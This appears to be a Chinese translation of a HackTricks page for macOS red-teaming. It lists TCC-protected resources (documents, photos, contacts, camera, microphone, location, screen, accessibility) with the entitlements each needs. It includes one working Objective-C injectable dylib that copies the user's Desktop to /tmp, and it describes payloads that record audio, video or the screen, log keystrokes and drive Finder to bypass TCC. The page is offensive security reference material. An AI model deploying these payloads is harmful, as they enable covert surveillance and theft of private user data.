macOS TCC Payloads

从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

桌面

  • 授权: 无

  • TCC: kTCCServiceSystemPolicyDesktopFolder

$HOME/Desktop 复制到 /tmp/desktop

#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#import <Foundation/Foundation.h>

// gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m

__attribute__((constructor))
void myconstructor(int argc, const char **argv)
{
freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt

NSFileManager *fileManager = [NSFileManager defaultManager];
NSError *error = nil;

// Get the path to the user's Pictures folder
NSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@"Desktop"];
NSString *tmpPhotosPath = @"/tmp/desktop";

// Copy the contents recursively
if (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {
NSLog(@"Error copying items: %@", error);
}

NSLog(@"Copy completed successfully.", error);

fclose(stderr); // Close the file stream
}

文档

  • 权限: 无

  • TCC: kTCCServiceSystemPolicyDocumentsFolder

$HOME/Documents复制到/tmp/documents

下载

  • 权限: 无

  • TCC: kTCCServiceSystemPolicyDownloadsFolder

$HOME/Downloads复制到/tmp/downloads

照片库

  • 权限: com.apple.security.personal-information.photos-library

  • TCC: kTCCServicePhotos

$HOME/Pictures/Photos Library.photoslibrary复制到/tmp/photos

联系人

  • 权限: com.apple.security.personal-information.addressbook

  • TCC: kTCCServiceAddressBook

$HOME/Library/Application Support/AddressBook复制到/tmp/contacts

日历

  • 权限: com.apple.security.personal-information.calendars

  • TCC: kTCCServiceCalendar

$HOME/Library/Calendars复制到/tmp/calendars

摄像头

  • 权限: com.apple.security.device.camera

  • TCC: kTCCServiceCamera

录制一个3秒的视频并保存在 /tmp/recording.mov

检查程序是否具有访问摄像头的权限。

使用相机拍照

麦克风

  • 权限: com.apple.security.device.audio-input

  • TCC: kTCCServiceMicrophone

录制5秒音频并将其存储在 /tmp/recording.m4a

检查应用程序是否具有对麦克风的访问权限。

录制一段5秒的音频并将其存储在 /tmp/recording.wav 中。

位置

要获取位置信息,必须启用位置服务(来自隐私与安全),否则应用程序将无法访问位置信息。

  • 授权: com.apple.security.personal-information.location

  • TCC: 已授予在 /var/db/locationd/clients.plist

将位置信息写入 /tmp/logs.txt

屏幕录制

  • 权限: 无

  • TCC: kTCCServiceScreenCapture

/tmp/screen.mov 中录制主屏幕 5 秒。

记录主屏幕5秒钟

辅助功能

  • 权限: 无

  • TCC: kTCCServiceAccessibility

使用 TCC 权限来接受通过按下回车键控制 Finder 并绕过 TCC 的方式

将按键存储在 /tmp/keystrokes.txt 文件中

辅助功能是一个非常强大的权限,您可以以其他方式滥用它,例如,您可以执行按键攻击,而无需调用系统事件。

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

支持HackTricks的其他方式:

上一页macOS Apple Scripts下一页macOS Dangerous Entitlements & TCC perms

最后更新于